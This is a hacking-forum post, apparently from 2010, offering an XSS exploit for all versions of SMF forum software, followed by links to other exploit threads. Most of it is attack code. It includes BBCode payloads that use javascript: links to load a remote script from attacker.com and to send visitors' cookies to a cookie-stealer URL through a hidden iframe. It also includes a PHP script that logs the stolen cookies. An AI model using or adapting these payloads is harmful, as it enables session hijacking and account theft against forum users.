XSS BBCode Exploit SMF All Versions

« **en:** Febrero 25, 2010, 11:19:12 am »

Author: Xianur0

BBCode of the smf not filtered properly specified urls:

[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]

Click on the image, run the javascript..

BBC Cookie Exploit:

Código: [Seleccionar]

[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3Ciframe+width%3D%220%25%22+height%3D%220%25%22+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fcookiestealer.php%3Fcookie%3D%27+%2Bdocument.cookie+%2B%27+frameborder%3D%220%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]

PHP Cookie Stealer:

Código: [Seleccionar]

<?php
$cookie = $_GET['cookie'];
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>

Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]\|CVE2017-5638 Iniciado por Eschiclers	Respuestas: 9 Vistas: 3740	Marzo 23, 2017, 03:57:38 pm por zoro248
[Video/ing] Ms Word Office Silent Exploit Builder RECODED from scratch FUD 2016 Iniciado por simdia	Respuestas: 0 Vistas: 2158	Diciembre 25, 2015, 08:40:37 am por simdia
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7 Iniciado por CalebBucker	Respuestas: 1 Vistas: 2330	Septiembre 17, 2012, 04:49:25 pm por Slore
MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit Iniciado por Stuxnet	Respuestas: 1 Vistas: 3467	Octubre 24, 2014, 09:18:14 pm por zekurity
[Symlink] + Bypass AdminPanel Joomla + Exploit 0day Java7 Iniciado por CalebBucker	Respuestas: 1 Vistas: 1991	Septiembre 06, 2012, 03:26:16 pm por hdbreaker

Esta es una respuesta al tema: XSS BBCode Exploit SMF All Versions en La plantilla. Bugs y Exploits

XSS BBCode Exploit SMF All Versions

dracko.rx

XSS BBCode Exploit SMF All Versions

Similar topics (5)